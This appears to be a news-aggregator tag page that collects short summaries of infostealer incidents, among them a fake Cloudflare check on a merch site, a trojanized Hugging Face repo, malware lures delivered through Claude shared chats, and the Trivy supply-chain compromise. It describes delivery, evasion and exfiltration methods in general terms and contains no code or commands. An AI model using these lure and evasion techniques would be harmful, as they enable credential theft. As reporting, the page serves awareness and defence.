tldrdailynews.com logo
Tag

Infostealer

All articles tagged with #infostealer

Kash Patel's merch site hacked to push malware through a fake Cloudflare check
technology5 days ago

Kash Patel's merch site hacked to push malware through a fake Cloudflare check

A Based Apparel storefront tied to Kash Patel was compromised: visitors encountered a modified Cloudflare verification page and were urged to copy a code into their terminal, which installed a Mac-specific infostealer malware designed to harvest credentials, browser data, crypto extension info, and keychain items, with a suspected payment skimmer also present. The attack leveraged a malicious WordPress plugin, while initial access remains unclear. Patel has distanced himself from the store, and there’s no confirmed FBI involvement at this time.

via Straight Arrow News - SAN|
#cloudflare#infostealer#malware
Fake OpenAI Privacy Filter Repo Delivers Windows Infostealer on Hugging Face
security16 days ago

Fake OpenAI Privacy Filter Repo Delivers Windows Infostealer on Hugging Face

A clone of OpenAI's Privacy Filter on Hugging Face impersonated the legitimate model to distribute a Windows infostealer via a loader that downloads payloads through Base64, JSON Keeper, and PowerShell, then sets up a one-shot scheduled task to run the final malware and exfiltrate data (screenshots, crypto wallets, browser data) to a remote domain while attempting to evade detection by disabling AMSI/ETW; the repo peaked at #1 with about 244,000 downloads before being disabled, and researchers link it to similar loaders and ValleyRAT-related campaigns targeting open-source ecosystems.

via The Hacker News|
#huggingface#infostealer#malware
Mac malware slips into Claude chats via Google ads
technology17 days ago

Mac malware slips into Claude chats via Google ads

Researchers uncovered a malvertising campaign that abuses Google Ads and Claude.ai shared chats to deliver macOS malware. Sponsored results mislead users to claude.ai while a Claude chat guides them to paste a terminal command that downloads a polymorphic loader and a second-stage payload executed via osascript, enabling remote code execution; some variants also exfiltrate browser data and Keychain contents. The operation uses two separate infrastructures and even performs locale checks to skip certain targets. To stay safe, download Claude apps directly from claude.ai and avoid following terminal commands shown in chats or ads.

via BleepingComputer|
#claudeai#infostealer#macos
Chrome secures sessions by binding cookies to hardware, thwarting infostealer theft
technology1 month ago

Chrome secures sessions by binding cookies to hardware, thwarting infostealer theft

Google Chrome 146 on Windows adds Device Bound Session Credentials (DBSC), cryptographically linking a user’s session to the device’s hardware (TPM on Windows, Secure Enclave on macOS) so stolen session cookies can’t be exploited. New short-lived cookies require possession of the hardware-bound private key, otherwise they expire quickly. macOS support is planned for a future Chrome release. The DBSC protocol, developed with Microsoft and tested with partners like Okta, aims to reduce cookie theft while preserving privacy, with implementation guidance and W3C specs available for developers.

via BleepingComputer|
#chrome#dbsc#hardware-security
Trivy hit by TeamPCP supply-chain attack through GitHub Actions
security2 months ago

Trivy hit by TeamPCP supply-chain attack through GitHub Actions

The Trivy vulnerability scanner was compromised in a supply-chain attack by threat actors TeamPCP, who backdoored the Trivy GitHub build process and trojanized releases and related GitHub Actions (notably v0.69.4). This allowed an infostealer to harvest credentials and other secrets from GitHub Actions runners, CI configs, and local developer environments, exfiltrating data to a typosquatted C2 server or via a public repo. Attackers gained write access to publish malicious releases and force-push most tags, making detection difficult; Aqua Security linked the breach to an earlier credential exfiltration and noted token rotation wasn't atomic. The incident is connected to a follow-up CanisterWorm npm campaign by the same actor. Remediation includes rotating all secrets, auditing for compromise, and investigating for persistence across environments.

via BleepingComputer|
#github-actions#infostealer#security
Public Database Leak Exposes 149 Million Logins, Highlighting Infostealer Risk
cybersecurity4 months ago

Public Database Leak Exposes 149 Million Logins, Highlighting Infostealer Risk

A publicly accessible database exposed 149 million account credentials, including 48 million Gmail logins and 17 million Facebook logins, along with government, banking, and education accounts. The researcher who found it suspects infostealing malware collected the data, and the provider took the trove down after being alerted; the leak highlights how unsecured databases can become a goldmine for cybercriminals.

via WIRED|
#cybersecurity#data-breach#infostealer
Hacker Injects Malware into Early Access Steam Game
technology10 months ago

Hacker Injects Malware into Early Access Steam Game

A threat actor called EncryptHub compromised the early access Steam game Chemia by injecting malware that steals user data, which remains available on Steam and poses a risk to players. The malware includes HijackLoader and Vidar infostealer, and was added through malicious binaries, with the attack possibly involving insider help. Steam has not issued an official statement, and users are advised to avoid downloading the game until further notice.

via BleepingComputer|
#chemia#encrypthub#infostealer
Minecraft Players Targeted by Malware Masquerading as Game Mods
technology11 months ago

Minecraft Players Targeted by Malware Masquerading as Game Mods

A malware campaign by Stargazers Ghost Network targets Minecraft players with fake mods and cheats, infecting Windows devices to steal credentials, tokens, and cryptocurrency wallets through malicious Java and .NET payloads distributed via GitHub repositories and Pastebin links, with a focus on evading detection and exfiltrating data to Russian-controlled servers.

via BleepingComputer|
#cybersecurity#github#infostealer
"PyPI Malware Threatens Windows and Linux Users with Crypto and Info Theft"
cybersecurity2 years ago

"PyPI Malware Threatens Windows and Linux Users with Crypto and Info Theft"

Malicious packages on the PyPI repository have been found to deliver the WhiteSnake Stealer malware on Windows systems, while also targeting Linux hosts with a Python script. The malware, uploaded by a threat actor named "WS," is capable of stealing information, communicating with a C&C server using the Tor protocol, and exfiltrating sensitive data, particularly crypto wallet information. The packages have been observed to overwrite clipboard content with attacker-owned wallet addresses and steal data from browsers, applications, and crypto services. This discovery highlights the ability of a single malware author to disseminate multiple info-stealing malware packages into the PyPI library over time.

via The Hacker News|
#cybersecurity#infostealer#malware
"Realst Malware: Protecting Your macOS Sonoma and Cryptocurrency Wallets"
cybersecurity2 years ago

"Realst Malware: Protecting Your macOS Sonoma and Cryptocurrency Wallets"

Cybercriminals are spreading a new infostealer malware called Realst through fake blockchain games, targeting both Windows and macOS users. Some variants of the malware are already targeting macOS 14 Sonoma, which is set to be released in the fall. Realst silently collects web browser data, including stored passwords, and can empty cryptocurrency wallets. To protect against Realst and other malware, users are advised to be cautious when installing software outside the official Mac App Store, verify links before opening them, use strong passwords and two-step authentication, exercise caution when granting permissions, and keep devices and applications up-to-date.

via 9to5Mac|
#cybersecurity#infostealer#macos